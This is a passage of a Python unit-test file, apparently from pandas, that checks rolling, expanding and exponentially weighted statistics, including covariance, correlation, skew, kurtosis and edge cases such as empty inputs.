w[s.notna()] = _weights(s[s.notna()], com=com,
adjust=adjust, ignore_na=False)
elif adjust:
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
w.iat[i] = pow(1. / (1. - alpha), i)
else:
sum_wts = 0.
prev_i = -1
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
if prev_i == -1:
w.iat[i] = 1.
else:
w.iat[i] = alpha * sum_wts / pow(1. - alpha,
i - prev_i)
sum_wts += w.iat[i]
prev_i = i
return w
def _variance_debiasing_factors(s, com, adjust, ignore_na):
weights = _weights(s, com=com, adjust=adjust, ignore_na=ignore_na)
cum_sum = weights.cumsum().fillna(method='ffill')
cum_sum_sq = (weights * weights).cumsum().fillna(method='ffill')
numerator = cum_sum * cum_sum
denominator = numerator - cum_sum_sq
denominator[denominator <= 0.] = np.nan
return numerator / denominator
def _ewma(s, com, min_periods, adjust, ignore_na):
weights = _weights(s, com=com, adjust=adjust, ignore_na=ignore_na)
result = s.multiply(weights).cumsum().divide(weights.cumsum(
)).fillna(method='ffill')
result[s.expanding().count() < (max(min_periods, 1) if min_periods
else 1)] = np.nan
return result
com = 3.
# test consistency between different ewm* moments
self._test_moments_consistency(
min_periods=min_periods,
count=lambda x: x.expanding().count(),
mean=lambda x: x.ewm(com=com, min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na).mean(),
mock_mean=lambda x: _ewma(x, com=com,
min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na),
corr=lambda x, y: x.ewm(com=com, min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na).corr(y),
var_unbiased=lambda x: (
x.ewm(com=com, min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na).var(bias=False)),
std_unbiased=lambda x: (
x.ewm(com=com, min_periods=min_periods,
adjust=adjust, ignore_na=ignore_na)
.std(bias=False)),
cov_unbiased=lambda x, y: (
x.ewm(com=com, min_periods=min_periods,
adjust=adjust, ignore_na=ignore_na)
.cov(y, bias=False)),
var_biased=lambda x: (
x.ewm(com=com, min_periods=min_periods,
adjust=adjust, ignore_na=ignore_na)
.var(bias=True)),
std_biased=lambda x: x.ewm(com=com, min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na).std(bias=True),
cov_biased=lambda x, y: (
x.ewm(com=com, min_periods=min_periods,
adjust=adjust, ignore_na=ignore_na)
.cov(y, bias=True)),
var_debiasing_factors=lambda x: (
_variance_debiasing_factors(x, com=com, adjust=adjust,
ignore_na=ignore_na)))
@pytest.mark.slow
@pytest.mark.parametrize(
'min_periods', [0, 1, 2, 3, 4])
def test_expanding_consistency(self, min_periods):
# suppress warnings about empty slices, as we are deliberately testing
# with empty/0-length Series/DataFrames
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message=".*(empty slice|0 for slice).*",
category=RuntimeWarning)
# test consistency between different expanding_* moments
self._test_moments_consistency(
min_periods=min_periods,
count=lambda x: x.expanding().count(),
mean=lambda x: x.expanding(
min_periods=min_periods).mean(),
mock_mean=lambda x: x.expanding(
min_periods=min_periods).sum() / x.expanding().count(),
corr=lambda x, y: x.expanding(
min_periods=min_periods).corr(y),
var_unbiased=lambda x: x.expanding(
min_periods=min_periods).var(),
std_unbiased=lambda x: x.expanding(
min_periods=min_periods).std(),
cov_unbiased=lambda x, y: x.expanding(
min_periods=min_periods).cov(y),
var_biased=lambda x: x.expanding(
min_periods=min_periods).var(ddof=0),
std_biased=lambda x: x.expanding(
min_periods=min_periods).std(ddof=0),
cov_biased=lambda x, y: x.expanding(
min_periods=min_periods).cov(y, ddof=0),
var_debiasing_factors=lambda x: (
x.expanding().count() /
(x.expanding().count() - 1.)
.replace(0., np.nan)))
# test consistency between expanding_xyz() and either (a)
# expanding_apply of Series.xyz(), or (b) expanding_apply of
# np.nanxyz()
for (x, is_constant, no_nans) in self.data:
functions = self.base_functions
# GH 8269
if no_nans:
functions = self.base_functions + self.no_nan_functions
for (f, require_min_periods, name) in functions:
expanding_f = getattr(
x.expanding(min_periods=min_periods), name)
if (require_min_periods and
(min_periods is not None) and
(min_periods < require_min_periods)):
continue
if name == 'count':
expanding_f_result = expanding_f()
expanding_apply_f_result = x.expanding(
min_periods=0).apply(func=f, raw=True)
else:
if name in ['cov', 'corr']:
expanding_f_result = expanding_f(
pairwise=False)
else:
expanding_f_result = expanding_f()
expanding_apply_f_result = x.expanding(
min_periods=min_periods).apply(func=f, raw=True)
# GH 9422
if name in ['sum', 'prod']:
assert_equal(expanding_f_result,
expanding_apply_f_result)
@pytest.mark.slow
@pytest.mark.parametrize(
'window,min_periods,center', list(_rolling_consistency_cases()))
def test_rolling_consistency(self, window, min_periods, center):
# suppress warnings about empty slices, as we are deliberately testing
# with empty/0-length Series/DataFrames
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message=".*(empty slice|0 for slice).*",
category=RuntimeWarning)
# test consistency between different rolling_* moments
self._test_moments_consistency(
min_periods=min_periods,
count=lambda x: (
x.rolling(window=window, center=center)
.count()),
mean=lambda x: (
x.rolling(window=window, min_periods=min_periods,
center=center).mean()),
mock_mean=lambda x: (
x.rolling(window=window,
min_periods=min_periods,
center=center).sum()
.divide(x.rolling(window=window,
min_periods=min_periods,
center=center).count())),
corr=lambda x, y: (
x.rolling(window=window, min_periods=min_periods,
center=center).corr(y)),
var_unbiased=lambda x: (
x.rolling(window=window, min_periods=min_periods,
center=center).var()),
std_unbiased=lambda x: (
x.rolling(window=window, min_periods=min_periods,
center=center).std()),
cov_unbiased=lambda x, y: (
x.rolling(window=window, min_periods=min_periods,
center=center).cov(y)),
var_biased=lambda x: (
x.rolling(window=window, min_periods=min_periods,
center=center).var(ddof=0)),
std_biased=lambda x: (
x.rolling(window=window, min_periods=min_periods,
center=center).std(ddof=0)),
cov_biased=lambda x, y: (
x.rolling(window=window, min_periods=min_periods,
center=center).cov(y, ddof=0)),
var_debiasing_factors=lambda x: (
x.rolling(window=window, center=center).count()
.divide((x.rolling(window=window, center=center)
.count() - 1.)
.replace(0., np.nan))))
# test consistency between rolling_xyz() and either (a)
# rolling_apply of Series.xyz(), or (b) rolling_apply of
# np.nanxyz()
for (x, is_constant, no_nans) in self.data:
functions = self.base_functions
# GH 8269
if no_nans:
functions = self.base_functions + self.no_nan_functions
for (f, require_min_periods, name) in functions:
rolling_f = getattr(
x.rolling(window=window, center=center,
min_periods=min_periods), name)
if require_min_periods and (
min_periods is not None) and (
min_periods < require_min_periods):
continue
if name == 'count':
rolling_f_result = rolling_f()
rolling_apply_f_result = x.rolling(
window=window, min_periods=0,
center=center).apply(func=f, raw=True)
else:
if name in ['cov', 'corr']:
rolling_f_result = rolling_f(
pairwise=False)
else:
rolling_f_result = rolling_f()
rolling_apply_f_result = x.rolling(
window=window, min_periods=min_periods,
center=center).apply(func=f, raw=True)
# GH 9422
if name in ['sum', 'prod']:
assert_equal(rolling_f_result,
rolling_apply_f_result)
# binary moments
def test_rolling_cov(self):
A = self.series
B = A + randn(len(A))
result = A.rolling(window=50, min_periods=25).cov(B)
tm.assert_almost_equal(result[-1], np.cov(A[-50:], B[-50:])[0, 1])
def test_rolling_cov_pairwise(self):
self._check_pairwise_moment('rolling', 'cov', window=10, min_periods=5)
def test_rolling_corr(self):
A = self.series
B = A + randn(len(A))
result = A.rolling(window=50, min_periods=25).corr(B)
tm.assert_almost_equal(result[-1], np.corrcoef(A[-50:], B[-50:])[0, 1])
# test for correct bias correction
a = tm.makeTimeSeries()
b = tm.makeTimeSeries()
a[:5] = np.nan
b[:10] = np.nan
result = a.rolling(window=len(a), min_periods=1).corr(b)
tm.assert_almost_equal(result[-1], a.corr(b))
def test_rolling_corr_pairwise(self):
self._check_pairwise_moment('rolling', 'corr', window=10,
min_periods=5)
@pytest.mark.parametrize('window', range(7))
def test_rolling_corr_with_zero_variance(self, window):
# GH 18430
s = pd.Series(np.zeros(20))
other = pd.Series(np.arange(20))
assert s.rolling(window=window).corr(other=other).isna().all()
def _check_pairwise_moment(self, dispatch, name, **kwargs):
def get_result(obj, obj2=None):
return getattr(getattr(obj, dispatch)(**kwargs), name)(obj2)
result = get_result(self.frame)
result = result.loc[(slice(None), 1), 5]
result.index = result.index.droplevel(1)
expected = get_result(self.frame[1], self.frame[5])
tm.assert_series_equal(result, expected, check_names=False)
def test_flex_binary_moment(self):
# GH3155
# don't blow the stack
pytest.raises(TypeError, rwindow._flex_binary_moment, 5, 6, None)
def test_corr_sanity(self):
# GH 3155
df = DataFrame(np.array(
[[0.87024726, 0.18505595], [0.64355431, 0.3091617],
[0.92372966, 0.50552513], [0.00203756, 0.04520709],
[0.84780328, 0.33394331], [0.78369152, 0.63919667]]))
res = df[0].rolling(5, center=True).corr(df[1])
assert all(np.abs(np.nan_to_num(x)) <= 1 for x in res)
# and some fuzzing
for _ in range(10):
df = DataFrame(np.random.rand(30, 2))
res = df[0].rolling(5, center=True).corr(df[1])
try:
assert all(np.abs(np.nan_to_num(x)) <= 1 for x in res)
except AssertionError:
print(res)
@pytest.mark.parametrize('method', ['corr', 'cov'])
def test_flex_binary_frame(self, method):
series = self.frame[1]
res = getattr(series.rolling(window=10), method)(self.frame)
res2 = getattr(self.frame.rolling(window=10), method)(series)
exp = self.frame.apply(lambda x: getattr(
series.rolling(window=10), method)(x))
tm.assert_frame_equal(res, exp)
tm.assert_frame_equal(res2, exp)
frame2 = self.frame.copy()
frame2.values[:] = np.random.randn(*frame2.shape)
res3 = getattr(self.frame.rolling(window=10), method)(frame2)
exp = DataFrame(dict((k, getattr(self.frame[k].rolling(
window=10), method)(frame2[k])) for k in self.frame))
tm.assert_frame_equal(res3, exp)
def test_ewmcov(self):
self._check_binary_ew('cov')
def test_ewmcov_pairwise(self):
self._check_pairwise_moment('ewm', 'cov', span=10, min_periods=5)
def test_ewmcorr(self):
self._check_binary_ew('corr')
def test_ewmcorr_pairwise(self):
self._check_pairwise_moment('ewm', 'corr', span=10, min_periods=5)
def _check_binary_ew(self, name):
def func(A, B, com, **kwargs):
return getattr(A.ewm(com, **kwargs), name)(B)
A = Series(randn(50), index=np.arange(50))
B = A[2:] + randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = func(A, B, 20, min_periods=5)
assert np.isnan(result.values[:14]).all()
assert not np.isnan(result.values[14:]).any()
# GH 7898
for min_periods in (0, 1, 2):
result = func(A, B, 20, min_periods=min_periods)
# binary functions (ewmcov, ewmcorr) with bias=False require at
# least two values
assert np.isnan(result.values[:11]).all()
assert not np.isnan(result.values[11:]).any()
# check series of length 0
result = func(Series([]), Series([]), 50, min_periods=min_periods)
tm.assert_series_equal(result, Series([]))
# check series of length 1
result = func(
Series([1.]), Series([1.]), 50, min_periods=min_periods)
tm.assert_series_equal(result, Series([np.NaN]))
pytest.raises(Exception, func, A, randn(50), 20, min_periods=5)
def test_expanding_apply_args_kwargs(self, raw):
def mean_w_arg(x, const):
return np.mean(x) + const
df = DataFrame(np.random.rand(20, 3))
expected = df.expanding().apply(np.mean, raw=raw) + 20.
result = df.expanding().apply(mean_w_arg,
raw=raw,
args=(20, ))
tm.assert_frame_equal(result, expected)
result = df.expanding().apply(mean_w_arg,
raw=raw,
kwargs={'const': 20})
tm.assert_frame_equal(result, expected)
def test_expanding_corr(self):
A = self.series.dropna()
B = (A + randn(len(A)))[:-5]
result = A.expanding().corr(B)
rolling_result = A.rolling(window=len(A), min_periods=1).corr(B)
tm.assert_almost_equal(rolling_result, result)
def test_expanding_count(self):
result = self.series.expanding().count()
tm.assert_almost_equal(result, self.series.rolling(
window=len(self.series)).count())
def test_expanding_quantile(self):
result = self.series.expanding().quantile(0.5)
rolling_result = self.series.rolling(window=len(self.series),
min_periods=1).quantile(0.5)
tm.assert_almost_equal(result, rolling_result)
def test_expanding_cov(self):
A = self.series
B = (A + randn(len(A)))[:-5]
result = A.expanding().cov(B)
rolling_result = A.rolling(window=len(A), min_periods=1).cov(B)
tm.assert_almost_equal(rolling_result, result)
def test_expanding_cov_pairwise(self):
result = self.frame.expanding().corr()
rolling_result = self.frame.rolling(window=len(self.frame),
min_periods=1).corr()
tm.assert_frame_equal(result, rolling_result)
def test_expanding_corr_pairwise(self):
result = self.frame.expanding().corr()
rolling_result = self.frame.rolling(window=len(self.frame),
min_periods=1).corr()
tm.assert_frame_equal(result, rolling_result)
def test_expanding_cov_diff_index(self):
# GH 7512
s1 = Series([1, 2, 3], index=[0, 1, 2])
s2 = Series([1, 3], index=[0, 2])
result = s1.expanding().cov(s2)
expected = Series([None, None, 2.0])
tm.assert_series_equal(result, expected)
s2a = Series([1, None, 3], index=[0, 1, 2])
result = s1.expanding().cov(s2a)
tm.assert_series_equal(result, expected)
s1 = Series([7, 8, 10], index=[0, 1, 3])
s2 = Series([7, 9, 10], index=[0, 2, 3])
result = s1.expanding().cov(s2)
expected = Series([None, None, None, 4.5])
tm.assert_series_equal(result, expected)
def test_expanding_corr_diff_index(self):
# GH 7512
s1 = Series([1, 2, 3], index=[0, 1, 2])
s2 = Series([1, 3], index=[0, 2])
result = s1.expanding().corr(s2)
expected = Series([None, None, 1.0])
tm.assert_series_equal(result, expected)
s2a = Series([1, None, 3], index=[0, 1, 2])
result = s1.expanding().corr(s2a)
tm.assert_series_equal(result, expected)
s1 = Series([7, 8, 10], index=[0, 1, 3])
s2 = Series([7, 9, 10], index=[0, 2, 3])
result = s1.expanding().corr(s2)
expected = Series([None, None, None, 1.])
tm.assert_series_equal(result, expected)
def test_rolling_cov_diff_length(self):
# GH 7512
s1 = Series([1, 2, 3], index=[0, 1, 2])
s2 = Series([1, 3], index=[0, 2])
result = s1.rolling(window=3, min_periods=2).cov(s2)
expected = Series([None, None, 2.0])
tm.assert_series_equal(result, expected)
s2a = Series([1, None, 3], index=[0, 1, 2])
result = s1.rolling(window=3, min_periods=2).cov(s2a)
tm.assert_series_equal(result, expected)
def test_rolling_corr_diff_length(self):
# GH 7512
s1 = Series([1, 2, 3], index=[0, 1, 2])
s2 = Series([1, 3], index=[0, 2])
result = s1.rolling(window=3, min_periods=2).corr(s2)
expected = Series([None, None, 1.0])
tm.assert_series_equal(result, expected)
s2a = Series([1, None, 3], index=[0, 1, 2])
result = s1.rolling(window=3, min_periods=2).corr(s2a)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
'f',
[
lambda x: (x.rolling(window=10, min_periods=5)
.cov(x, pairwise=False)),
lambda x: (x.rolling(window=10, min_periods=5)
.corr(x, pairwise=False)),
lambda x: x.rolling(window=10, min_periods=5).max(),
lambda x: x.rolling(window=10, min_periods=5).min(),
lambda x: x.rolling(window=10, min_periods=5).sum(),
lambda x: x.rolling(window=10, min_periods=5).mean(),
lambda x: x.rolling(window=10, min_periods=5).std(),
lambda x: x.rolling(window=10, min_periods=5).var(),
lambda x: x.rolling(window=10, min_periods=5).skew(),
lambda x: x.rolling(window=10, min_periods=5).kurt(),
lambda x: x.rolling(
window=10, min_periods=5).quantile(quantile=0.5),
lambda x: x.rolling(window=10, min_periods=5).median(),
lambda x: x.rolling(window=10, min_periods=5).apply(
sum, raw=False),
lambda x: x.rolling(window=10, min_periods=5).apply(
sum, raw=True),
lambda x: x.rolling(win_type='boxcar',
window=10, min_periods=5).mean()])
def test_rolling_functions_window_non_shrinkage(self, f):
# GH 7764
s = Series(range(4))
s_expected = Series(np.nan, index=s.index)
df = DataFrame([[1, 5], [3, 2], [3, 9], [-1, 0]], columns=['A', 'B'])
df_expected = DataFrame(np.nan, index=df.index, columns=df.columns)
try:
s_result = f(s)
tm.assert_series_equal(s_result, s_expected)
df_result = f(df)
tm.assert_frame_equal(df_result, df_expected)
except (ImportError):
# scipy needed for rolling_window
pytest.skip("scipy not available")
def test_rolling_functions_window_non_shrinkage_binary(self):
# corr/cov return a MI DataFrame
df = DataFrame([[1, 5], [3, 2], [3, 9], [-1, 0]],
columns=Index(['A', 'B'], name='foo'),
index=Index(range(4), name='bar'))
df_expected = DataFrame(
columns=Index(['A', 'B'], name='foo'),
index=pd.MultiIndex.from_product([df.index, df.columns],
names=['bar', 'foo']),
dtype='float64')
functions = [lambda x: (x.rolling(window=10, min_periods=5)
.cov(x, pairwise=True)),
lambda x: (x.rolling(window=10, min_periods=5)
.corr(x, pairwise=True))]
for f in functions:
df_result = f(df)
tm.assert_frame_equal(df_result, df_expected)
def test_moment_functions_zero_length(self):
# GH 8056
s = Series()
s_expected = s
df1 = DataFrame()
df1_expected = df1
df2 = DataFrame(columns=['a'])
df2['a'] = df2['a'].astype('float64')
df2_expected = df2
functions = [lambda x: x.expanding().count(),
lambda x: x.expanding(min_periods=5).cov(
x, pairwise=False),
lambda x: x.expanding(min_periods=5).corr(
x, pairwise=False),
lambda x: x.expanding(min_periods=5).max(),
lambda x: x.expanding(min_periods=5).min(),
lambda x: x.expanding(min_periods=5).sum(),
lambda x: x.expanding(min_periods=5).mean(),
lambda x: x.expanding(min_periods=5).std(),
lambda x: x.expanding(min_periods=5).var(),
lambda x: x.expanding(min_periods=5).skew(),
lambda x: x.expanding(min_periods=5).kurt(),
lambda x: x.expanding(min_periods=5).quantile(0.5),
lambda x: x.expanding(min_periods=5).median(),
lambda x: x.expanding(min_periods=5).apply(
sum, raw=False),
lambda x: x.expanding(min_periods=5).apply(
sum, raw=True),
lambda x: x.rolling(window=10).count(),
lambda x: x.rolling(window=10, min_periods=5).cov(
x, pairwise=False),
lambda x: x.rolling(window=10, min_periods=5).corr(
x, pairwise=False),
lambda x: x.rolling(window=10, min_periods=5).max(),
lambda x: x.rolling(window=10, min_periods=5).min(),
lambda x: x.rolling(window=10, min_periods=5).sum(),
lambda x: x.rolling(window=10, min_periods=5).mean(),
lambda x: x.rolling(window=10, min_periods=5).std(),
lambda x: x.rolling(window=10, min_periods=5).var(),
lambda x: x.rolling(window=10, min_periods=5).skew(),
lambda x: x.rolling(window=10, min_periods=5).kurt(),
lambda x: x.rolling(
window=10, min_periods=5).quantile(0.5),
lambda x: x.rolling(window=10, min_periods=5).median(),
lambda x: x.rolling(window=10, min_periods=5).apply(
sum, raw=False),
lambda x: x.rolling(window=10, min_periods=5).apply(
sum, raw=True),
lambda x: x.rolling(win_type='boxcar',
window=10, min_periods=5).mean(),
]
for f in functions:
try:
s_result = f(s)
tm.assert_series_equal(s_result, s_expected)
df1_result = f(df1)
tm.assert_frame_equal(df1_result, df1_expected)
df2_result = f(df2)
tm.assert_frame_equal(df2_result, df2_expected)
except (ImportError):
# scipy needed for rolling_window
continue
def test_moment_functions_zero_length_pairwise(self):
df1 = DataFrame()
df1_expected = df1
df2 = DataFrame(columns=Index(['a'], name='foo'),
index=Index([], name='bar'))
df2['a'] = df2['a'].astype('float64')
df1_expected = DataFrame(
index=pd.MultiIndex.from_product([df1.index, df1.columns]),
columns=Index([]))
df2_expected = DataFrame(
index=pd.MultiIndex.from_product([df2.index, df2.columns],
names=['bar', 'foo']),
columns=Index(['a'], name='foo'),
dtype='float64')
functions = [lambda x: (x.expanding(min_periods=5)
.cov(x, pairwise=True)),
lambda x: (x.expanding(min_periods=5)
.corr(x, pairwise=True)),
lambda x: (x.rolling(window=10, min_periods=5)
.cov(x, pairwise=True)),
lambda x: (x.rolling(window=10, min_periods=5)
.corr(x, pairwise=True)),
]
for f in functions:
df1_result = f(df1)
tm.assert_frame_equal(df1_result, df1_expected)
df2_result = f(df2)
tm.assert_frame_equal(df2_result, df2_expected)
def test_expanding_cov_pairwise_diff_length(self):
# GH 7512
df1 = DataFrame([[1, 5], [3, 2], [3, 9]],
columns=Index(['A', 'B'], name='foo'))
df1a = DataFrame([[1, 5], [3, 9]],
index=[0, 2],
columns=Index(['A', 'B'], name='foo'))
df2 = DataFrame([[5, 6], [None, None], [2, 1]],
columns=Index(['X', 'Y'], name='foo'))
df2a = DataFrame([[5, 6], [2, 1]],
index=[0, 2],
columns=Index(['X', 'Y'], name='foo'))
# TODO: xref gh-15826
# .loc is not preserving the names
result1 = df1.expanding().cov(df2a, pairwise=True).loc[2]
result2 = df1.expanding().cov(df2a, pairwise=True).loc[2]
result3 = df1a.expanding().cov(df2, pairwise=True).loc[2]
result4 = df1a.expanding().cov(df2a, pairwise=True).loc[2]
expected = DataFrame([[-3.0, -6.0], [-5.0, -10.0]],
columns=Index(['A', 'B'], name='foo'),
index=Index(['X', 'Y'], name='foo'))
tm.assert_frame_equal(result1, expected)
tm.assert_frame_equal(result2, expected)
tm.assert_frame_equal(result3, expected)
tm.assert_frame_equal(result4, expected)
def test_expanding_corr_pairwise_diff_length(self):
# GH 7512
df1 = DataFrame([[1, 2], [3, 2], [3, 4]],
columns=['A', 'B'],
index=Index(range(3), name='bar'))
df1a = DataFrame([[1, 2], [3, 4]],
index=Index([0, 2], name='bar'),
columns=['A', 'B'])
df2 = DataFrame([[5, 6], [None, None], [2, 1]],
columns=['X', 'Y'],
index=Index(range(3), name='bar'))
df2a = DataFrame([[5, 6], [2, 1]],
index=Index([0, 2], name='bar'),
columns=['X', 'Y'])
result1 = df1.expanding().corr(df2, pairwise=True).loc[2]
result2 = df1.expanding().corr(df2a, pairwise=True).loc[2]
result3 = df1a.expanding().corr(df2, pairwise=True).loc[2]
result4 = df1a.expanding().corr(df2a, pairwise=True).loc[2]
expected = DataFrame([[-1.0, -1.0], [-1.0, -1.0]],
columns=['A', 'B'],
index=Index(['X', 'Y']))
tm.assert_frame_equal(result1, expected)
tm.assert_frame_equal(result2, expected)
tm.assert_frame_equal(result3, expected)
tm.assert_frame_equal(result4, expected)
def test_rolling_skew_edge_cases(self):
all_nan = Series([np.NaN] * 5)
# yields all NaN (0 variance)
d = Series([1] * 5)
x = d.rolling(window=5).skew()
tm.assert_series_equal(all_nan, x)
# yields all NaN (window too small)
d = Series(np.random.randn(5))
x = d.rolling(window=2).skew()
tm.assert_series_equal(all_nan, x)
# yields [NaN, NaN, NaN, 0.177994, 1.548824]
d = Series([-1.50837035, -0.1297039, 0.19501095, 1.73508164, 0.41941401
])
expected = Series([np.NaN, np.NaN, np.NaN, 0.177994, 1.548824])
x = d.rolling(window=4).skew()
tm.assert_series_equal(expected, x)
def test_rolling_kurt_edge_cases(self):
all_nan = Series([np.NaN] * 5)
# yields all NaN (0 variance)
d = Series([1] * 5)
x = d.rolling(window=5).kurt()
tm.assert_series_equal(all_nan, x)
# yields all NaN (window too small)
d = Series(np.random.randn(5))
x = d.rolling(window=3).kurt()
tm.assert_series_equal(all_nan, x)
# yields [NaN, NaN, NaN, 1.224307, 2.671499]
d = Series([-1.50837035, -0.1297039, 0.19501095, 1.73508164, 0.41941401
])
expected = Series([np.NaN, np.NaN, np.NaN, 1.224307, 2.671499])
x = d.rolling(window=4).kurt()
tm.assert_series_equal(expected, x)
def test_rolling_skew_eq_value_fperr(self):
# #18804 all rolling skew for all equal values should return Nan
a = Series([1.1] * 15).rolling(window=10).skew()
assert np.isnan(a).all()
def test_rolling_kurt_eq_value_fperr(self):
# #18804 all rolling kurt for all equal values should return Nan
a = Series([1.1] * 15).rolling(window=10).kurt()
assert np.isnan(a).all()
@pytest.mark.parametrize('func,static_comp', [('sum', np.sum),
('mean', np.mean),
('max', np.max),
('min', np.min)],
ids=['sum', 'mean', 'max', 'min'])
def test_expanding_func(self, func, static_comp):
def expanding_func(x, min_periods=1, center=False, axis=0):
exp = x.expanding(min_periods=min_periods,
center=center, axis=axis)
return getattr(exp, func)()
self._check_expanding(expanding_func, static_comp, preserve_nan=False)
def test_expanding_apply(self, raw):
def expanding_mean(x, min_periods=1):
exp = x.expanding(min_periods=min_periods)
result = exp.apply(lambda x: x.mean(), raw=raw)
return result
# TODO(jreback), needed to add preserve_nan=False
# here to make this pass
self._check_expanding(expanding_mean, np.mean, preserve_nan=False)
ser = Series([])
tm.assert_series_equal(ser, ser.expanding().apply(
lambda x: x.mean(), raw=raw))
# GH 8080
s = Series([None, None, None])
result = s.expanding(min_periods=0).apply(lambda x: len(x), raw=raw)
expected = Series([1., 2., 3.])
tm.assert_series_equal(result, expected)
def _check_expanding(self, func, static_comp, has_min_periods=True,
has_time_rule=True, preserve_nan=True):
series_result = func(self.series)
assert isinstance(series_result, Series)
frame_result = func(self.frame)
assert isinstance(frame_result, DataFrame)
result = func(self.series)
tm.assert_almost_equal(result[10], static_comp(self.series[:11]))
if preserve_nan:
assert result.iloc[self._nan_locs].isna().all()
ser = Series(randn(50))
if has_min_periods:
result = func(ser, min_periods=30)
assert result[:29].isna().all()
tm.assert_almost_equal(result.iloc[-1], static_comp(ser[:50]))
# min_periods is working correctly
result = func(ser, min_periods=15)
assert isna(result.iloc[13])
assert notna(result.iloc[14])
ser2 = Series(randn(20))
result = func(ser2, min_periods=5)
assert isna(result[3])
assert notna(result[4])
# min_periods=0
result0 = func(ser, min_periods=0)
result1 = func(ser, min_periods=1)
tm.assert_almost_equal(result0, result1)
else:
result = func(ser)
tm.assert_almost_equal(result.iloc[-1], static_comp(ser[:50]))
def test_rolling_max_gh6297(self):
"""Replicate result expected in GH #6297"""
indices = [datetime(1975, 1, i) for i in range(1, 6)]
# So that we can have 2 datapoints on one of the days
indices.append(datetime(1975, 1, 3, 6, 0))
series = Series(range(1, 7), index=indices)
# Use floats instead of ints as values
series = series.map(lambda x: float(x))
# Sort chronologically
series = series.sort_index()
expected = Series([1.0, 2.0, 6.0, 4.0, 5.0],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
x = series.resample('D').max().rolling(window=1).max()
tm.assert_series_equal(expected, x)
def test_rolling_max_resample(self):
indices = [datetime(1975, 1, i) for i in range(1, 6)]
# So that we can have 3 datapoints on last day (4, 10, and 20)
indices.append(datetime(1975, 1, 5, 1))
indices.append(datetime(1975, 1, 5, 2))
series = Series(list(range(0, 5)) + [10, 20], index=indices)
# Use floats instead of ints as values
series = series.map(lambda x: float(x))
# Sort chronologically
series = series.sort_index()
# Default how should be max
expected = Series([0.0, 1.0, 2.0, 3.0, 20.0],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
x = series.resample('D').max().rolling(window=1).max()
tm.assert_series_equal(expected, x)
# Now specify median (10.0)
expected = Series([0.0, 1.0, 2.0, 3.0, 10.0],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
x = series.resample('D').median().rolling(window=1).max()
tm.assert_series_equal(expected, x)
# Now specify mean (4+10+20)/3
v = (4.0 + 10.0 + 20.0) / 3.0
expected = Series([0.0, 1.0, 2.0, 3.0, v],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
x = series.resample('D').mean().rolling(window=1).max()
tm.assert_series_equal(expected, x)
def test_rolling_min_resample(self):
indices = [datetime(1975, 1, i) for i in range(1, 6)]
# So that we can have 3 datapoints on last day (4, 10, and 20)
indices.append(datetime(1975, 1, 5, 1))
indices.append(datetime(1975, 1, 5, 2))
series = Series(list(range(0, 5)) + [10, 20], index=indices)
# Use floats instead of ints as values
series = series.map(lambda x: float(x))
# Sort chronologically
series = series.sort_index()
# Default how should be min
expected = Series([0.0, 1.0, 2.0, 3.0, 4.0],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
r = series.resample('D').min().rolling(window=1)
tm.assert_series_equal(expected, r.min())
def test_rolling_median_resample(self):
indices = [datetime(1975, 1, i) for i in range(1, 6)]
# So that we can have 3 datapoints on last day (4, 10, and 20)
indices.append(datetime(1975, 1, 5, 1))
indices.append(datetime(1975, 1, 5, 2))
series = Series(list(range(0, 5)) + [10, 20], index=indices)
# Use floats instead of ints as values
series = series.map(lambda x: float(x))
# Sort chronologically
series = series.sort_index()
# Default how should be median
expected = Series([0.0, 1.0, 2.0, 3.0, 10],
index=[datetime(1975, 1, i, 0) for i in range(1, 6)])
x = series.resample('D').median().rolling(window=1).median()
tm.assert_series_equal(expected, x)
def test_rolling_median_memory_error(self):
# GH11722
n = 20000
Series(np.random.randn(n)).rolling(window=2, center=False).median()
Series(np.random.randn(n)).rolling(window=2, center=False).median()
def test_rolling_min_max_numeric_types(self):
# GH12373
types_test = [np.dtype("f{}".format(width)) for width in [4, 8]]
types_test.extend([np.dtype("{}{}".format(sign, width))
for width in [1, 2, 4, 8] for sign in "ui"])
for data_type in types_test:
# Just testing that these don't throw exceptions and that
# the return type is float64. Other tests will cover quantitative
# correctness
result = (DataFrame(np.arange(20, dtype=data_type))
.rolling(window=5).max())
assert result.dtypes[0] == np.dtype("f8")
result = (DataFrame(np.arange(20, dtype=data_type))
.rolling(window=5).min())
assert result.dtypes[0] == np.dtype("f8")
class TestGrouperGrouping(object):
def setup_method(self, method):
self.series = Series(np.arange(10))
self.frame = DataFrame({'A': [1] * 20 + [2] * 12 + [3] * 8,
'B': np.arange(40)})
def test_mutated(self):
def f():
self.frame.groupby('A', foo=1)
pytest.raises(TypeError, f)
g = self.frame.groupby('A')
assert not g.mutated
g = self.frame.groupby('A', mutated=True)
assert g.mutated
def test_getitem(self):
g = self.frame.groupby('A')
g_mutated = self.frame.groupby('A', mutated=True)
expected = g_mutated.B.apply(lambda x: x.rolling(2).mean())
result = g.rolling(2).mean().B
tm.assert_series_equal(result, expected)
result = g.rolling(2).B.mean()
tm.assert_series_equal(result, expected)
result = g.B.rolling(2).mean()
tm.assert_series_equal(result, expected)
result = self.frame.B.groupby(self.frame.A).rolling(2).mean()
tm.assert_series_equal(result, expected)
def test_getitem_multiple(self):
# GH 13174
g = self.frame.groupby('A')
r = g.rolling(2)
g_mutated = self.frame.groupby('A', mutated=True)
expected = g_mutated.B.apply(lambda x: x.rolling(2).count())
result = r.B.count()
tm.assert_series_equal(result, expected)
result = r.B.count()
tm.assert_series_equal(result, expected)
def test_rolling(self):
g = self.frame.groupby('A')
r = g.rolling(window=4)
for f in ['sum', 'mean', 'min', 'max', 'count', 'kurt', 'skew']:
result = getattr(r, f)()
expected = g.apply(lambda x: getattr(x.rolling(4), f)())
